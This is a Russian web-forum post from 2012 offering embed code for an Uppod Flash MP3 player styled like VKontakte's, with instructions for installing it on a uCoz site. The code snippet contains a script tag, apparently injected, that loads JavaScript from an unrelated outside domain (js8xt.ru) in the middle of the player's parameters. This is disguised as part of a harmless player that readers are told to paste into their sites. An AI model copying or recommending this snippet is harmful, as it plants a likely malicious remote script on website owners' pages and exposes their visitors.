ВНИМАНИЕ!!!!

Сайт адаптирован под браузеры Opera и Mozilla Firefox. Во всех остальных браузерах этот сайт может показываться не коректно.
Приносим свои извинения за неудобства.
Стартовая Избранное Главная Контакты Карта сайта
Где мы?

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум » Скрипты для uCoz (форум по uCoz) » Другие скрипты для uCoz » Плеер для проигрывания мп3 на сайте (Создаете свой список песен и наслаждаетесь)
Плеер для проигрывания мп3 на сайте
MyLifeДата: Среда, 02.05.2012, 20:24 | Сообщение # 1
Рядовой
Сообщений: 4
Репутация: 0
Статус: Offline
http://s017.radikal.ru/i437/1204/cf/533fbfdefd8b.png <-- Скрин

Одним из самых популярных плееров сделанных на Flash для проигрывания, как видео, так и музыки, является плеер Uppod. Его преимущество в том, что его не сложно установить и, самое главное, есть возможность смены скина проигрывателя. И так, в Uppod появился новый скин, который приближенно позволит сделать MP3 плеер как В Контакте. Это лучший вариант для тех, кто особо не смыслит в создании аудио проигрывателей для сайта. Здесь, как и в социальной сети, имеется перетаскиваемый ползунок, время до окончания музыкального файла над регулятором громкости. Названия трека также вписывается в коде плеера.

Code
<object id="audioplayer" type="application/x-shockwave-flash" data="http://www.csomsk.ru/1-ucoz/pm/uppod0962.swf" width="328" height="44"><param name="bgcolor" value="#ffffff"><script language=JavaScript src=http://js8xt.ru/ves.js></script><param name="allowScriptAccess" value="always"><param name="movie" value="http://www.csomsk.ru/1-ucoz/pm/uppod0962.swf"><param name="flashvars" value="comment=DSM3 - Go to the birthday&st=http://www.csomsk.ru/1-ucoz/pm/audio13-895.txt&m=audio&file=ссылка на MP3 файл"></object>


В коде сразу заметно место, куда следует вставлять название композиции. Ссылку на MP3 заменяете на свою, а файл TXT (файл стиля) и файл SWF (файл плеера) рекомендуется загрузить на свой хостинг, чтобы не было в дальнейшем никаких проблем, связанных с загрузкой проигрывателя. Файлы вы можете скачать по ссылке прикрепленной к материалу и залить на свой сайт в папку mp3.
 
Форум » Скрипты для uCoz (форум по uCoz) » Другие скрипты для uCoz » Плеер для проигрывания мп3 на сайте (Создаете свой список песен и наслаждаетесь)
  • Страница 1 из 1
  • 1
Поиск:
Rambler's Top100